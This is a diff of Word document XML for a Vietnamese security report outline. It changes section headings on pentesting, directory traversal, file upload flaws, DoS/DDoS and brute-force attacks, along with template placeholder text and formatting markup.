+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="41" w:name="_Toc208343474"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>THỰC HÀNH VÀ ĐÁNH GIÁ BẢO MẬT</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="41"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="42" w:name="_Toc208343475"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Giới </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>thiệu về Kiểm thử Xâm nhập (Pentesting)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="42"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:ind w:left="792"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Nội dung của tiểu mục cấp 2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4483,6 +8738,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="43" w:name="_Toc208343476"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4493,7 +8749,84 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">Hậu quả </w:t>
+        <w:t>Tiểu mục cấp 3</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="43"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:ind w:left="1224"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Nội dung của tiểu mục cấp 3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="3"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="44" w:name="_Toc208343477"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Tiểu mục cấp 4</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="44"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:ind w:left="1728"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Nội dung của tiểu mục cấp 4</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4525,106 +8858,18 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Tấn công Directory Traversal và File Inclusion</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Cơ chế hoạt động</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> và phân loại</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="ja-JP"/>
-        </w:rPr>
-        <w:t>£</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Hậu quả </w:t>
-      </w:r>
+      <w:bookmarkStart w:id="45" w:name="_Toc208343478"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Các công cụ và môi trường thực hành</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="45"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4655,981 +8900,18 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Lỗ hổng tải lên tệp (File Upload Vulnerability)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Nguyên nhân và cách thức khai thác</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Hậu quả</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Tấn công từ chối dịch vụ (DoS/DDoS) </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Phân biệt DoS và DDoS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Các dạng tấn công theo lớp</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Hậu quả</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> và các case study nổi tiếng</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Tấn công dò mật khẩu (Brute-Force Attack)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Cơ chế hoạt động và các biến thể</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Hậu quả và các công cụ tấn công</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>BIỆN PHÁP PHÒNG CHỐNG VÀ BẢO VỆ</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Phòng </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>chống ở cấp độ Ứng dụng</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:ind w:left="792"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Nội dung của tiểu mục cấp 2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc207351932"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Tiểu mục cấp 3</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="4"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:ind w:left="1224"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Nội dung của tiểu mục cấp 3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="3"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc207351933"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Tiểu mục cấp 4</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="5"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:ind w:left="1728"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Nội dung của tiểu mục cấp 4</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
